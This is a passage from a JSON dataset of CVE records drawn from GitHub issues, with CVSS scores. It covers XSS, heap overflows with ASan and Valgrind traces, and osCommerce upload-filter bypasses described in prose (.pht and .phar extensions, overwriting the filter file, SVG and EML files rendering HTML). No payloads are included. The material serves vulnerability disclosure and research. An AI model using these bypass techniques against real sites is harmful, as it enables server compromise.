NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aec NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aec1a2 in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG efbdb9 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG efcf6c in APITAG APITAG NUMBERTAG d NUMBERTAG ab6b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b4a NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b4a NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG ab6c NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG efcf7c in APITAG APITAG NUMBERTAG d NUMBERTAG ab6b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG b4a NUMBERTAG e in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG b4a NUMBERTAG e in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG be in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG eb in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG d7a0 in posix_memalign ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG dfa3a4 in APITAG APITAG NUMBERTAG d NUMBERTAG f NUMBERTAG e6d in APITAG APITAG NUMBERTAG d NUMBERTAG f7be NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ee NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG ba2 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d6 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG ba2 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG d6 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG c1 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG b1e NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG fd in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f8b5e NUMBERTAG cb NUMBERTAG in __interceptor_malloc ( PATHTAG NUMBERTAG d NUMBERTAG ae NUMBERTAG f in APITAG APITAG NUMBERTAG d NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG b NUMBERTAG c1 in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG ef3b3a in APITAG APITAG NUMBERTAG d NUMBERTAG ab NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG d8 in APITAG APITAG NUMBERTAG d NUMBERTAG f7d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG f7db NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG e0c in APITAG APITAG NUMBERTAG d NUMBERTAG aad NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG aad5a6 in main APITAG NUMBERTAG f8b NUMBERTAG cfb NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). ''' System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Linux test virtual machine NUMBERTAG generic NUMBERTAG Ubuntu SMP Tue Jul NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18545",
        "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/14",
        "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/14",
        "Repo_new": "fiyocms/fiyocms",
        "Issue_Created_At": "2018-10-20T15:43:31Z",
        "description": "PATHTAG $_POST FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18553",
        "Issue_Url_old": "https://github.com/leanote/leanote/issues/822",
        "Issue_Url_new": "https://github.com/leanote/leanote/issues/822",
        "Repo_new": "leanote/leanote",
        "Issue_Created_At": "2018-10-20T04:34:31Z",
        "description": "There is a XSS. when I set the title at the APITAG Basic Setting\",I found there is not a sanitizer to filter the malicious code, such as APITAG .If I click the \"likes\" button at target's blog, when others open this blog, there is a pop window. APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18572",
        "Issue_Url_old": "https://github.com/osCommerce/oscommerce2/issues/631",
        "Issue_Url_new": "https://github.com/oscommerce/oscommerce2/issues/631",
        "Repo_new": "oscommerce/oscommerce2",
        "Issue_Created_At": "2018-11-05T09:03:29Z",
        "description": "APITAG NUMBERTAG allows to execute several file types.. Brief of this vulnerability APITAG use APITAG file for preventing to execute php and html files. But it is not complete set to preventing all of malicious files. As the result, Adversary can upload several types of malicious file. This vulnerability needs the admin credentials, but this vulnerability can be used to compromise web server that APITAG installed. Test Environment APITAG APITAG PHP NUMBERTAG APITAG (cli) Tested version NUMBERTAG Payload & Reason of vulnerability NUMBERTAG upload point Page : Admin page > Catalog > Categories / Products > New Products Upload malicious files via product images elements. Found Harmful Files is listed below NUMBERTAG PHP Code Execution Description of vulnerability APITAG file located in APITAG directory. It prevents to execution of several dangerous extensions. But its regular expression do not prevent pht extensions. As a result, php script with pht extension can be uploaded and executed. ps. If APITAG runs on PHP NUMBERTAG environment, phar extension also can be executed in the server. This vulnerability reserved to CVETAG NUMBERTAG Handle the arbitrary file to execute as PHP script Description of vulnerability Upload File filter can not prevent to upload new APITAG file. So, adversary can change the APITAG file. If APITAG file changed, all of the PHP supported file can be executed. Even file that has arbitrary extension and PHP script can be executed. This vulnerability reserved to CVETAG NUMBERTAG Execute HTML using SVG file format Description of vulnerability APITAG file in APITAG directory banned html extension, but there are several extensions that HTML can be executed. One of the extension string is svg . If adversary assemble SVG file and HTML file to SVG file, that assembed SVG file can be execute HTML in client browser NUMBERTAG Execute HTML using EML file format ( IE only ) Description of vulnerability APITAG file in APITAG directory banned html extension, but there are several extensions that HTML can be executed. eml extention is not executed in other browsers, but only Internet Explorer render HTML elements in eml file NUMBERTAG Execute HTML using Strange file extension or No extension Description of vulnerability APITAG file in APITAG directory banned html extension, but there are several extensions that HTML can be executed. The file that has no extension or strange extension can be rendered in web browsers. Vulnerability NUMBERTAG and NUMBERTAG are about PHP Code execution via arbitrary file upload, and others are about HTML Execution (related with XSS). These vulnerabilities needs administrator credentials, but I still think it is vulnerable. I did not upload test payloads due to abuse this vulnerabilities by other persons. If you needs to fix these vulnerability, please announce me your mail. Thank you.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-18579",
        "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/6",
        "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/6",
        "Repo_new": "ky-j/dedecms",
        "Issue_Created_At": "2018-10-22T14:06:14Z",
        "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG sp2. FILETAG Phink club APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18581",
        "Issue_Url_old": "https://github.com/jansol/LuPng/issues/7",
        "Issue_Url_new": "https://github.com/jansol/lupng/issues/7",
        "Repo_new": "jansol/lupng",
        "Issue_Created_At": "2018-10-21T07:15:32Z",
        "description": "Heap Buffer Overflow in Function APITAG I used clang NUMBERTAG and APITAG to build APITAG URLTAG , this file URLTAG can cause heap buffer overflow in function APITAG in lupng.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18582",
        "Issue_Url_old": "https://github.com/jansol/LuPng/issues/9",
        "Issue_Url_new": "https://github.com/jansol/lupng/issues/9",
        "Repo_new": "jansol/lupng",
        "Issue_Created_At": "2018-10-21T07:16:23Z",
        "description": "Heap Buffer Overflow in Function APITAG I used clang NUMBERTAG and APITAG to build APITAG URLTAG , this file URLTAG can cause heap buffer overflow in function APITAG in lupng.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18583",
        "Issue_Url_old": "https://github.com/jansol/LuPng/issues/8",
        "Issue_Url_new": "https://github.com/jansol/lupng/issues/8",
        "Repo_new": "jansol/lupng",
        "Issue_Created_At": "2018-10-21T07:15:59Z",
        "description": "Heap Buffer Overflow in Function APITAG I used clang NUMBERTAG and APITAG to build APITAG URLTAG , this file URLTAG can cause heap buffer overflow in function APITAG in lupng.c when executing this command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18599",
        "Issue_Url_old": "https://github.com/abeluck/stegdetect/issues/10",
        "Issue_Url_new": "https://github.com/abeluck/stegdetect/issues/10",
        "Repo_new": "abeluck/stegdetect",
        "Issue_Created_At": "2018-10-23T08:03:47Z",
        "description": "Out of bound write. PATHTAG valgrind ./stegdetect tF PATHTAG NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./stegdetect tF PATHTAG NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG ACF5: f5_compress APITAG NUMBERTAG by NUMBERTAG BE NUMBERTAG detect_f5 APITAG NUMBERTAG by NUMBERTAG C7: detect APITAG NUMBERTAG by NUMBERTAG main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEGV): dumping core NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG ACF5: f5_compress APITAG NUMBERTAG by NUMBERTAG BE NUMBERTAG detect_f5 APITAG NUMBERTAG by NUMBERTAG C7: detect APITAG NUMBERTAG by NUMBERTAG main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault APITAG the poc URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18608",
        "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/8",
        "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/8",
        "Repo_new": "ky-j/dedecms",
        "Issue_Created_At": "2018-10-23T05:48:28Z",
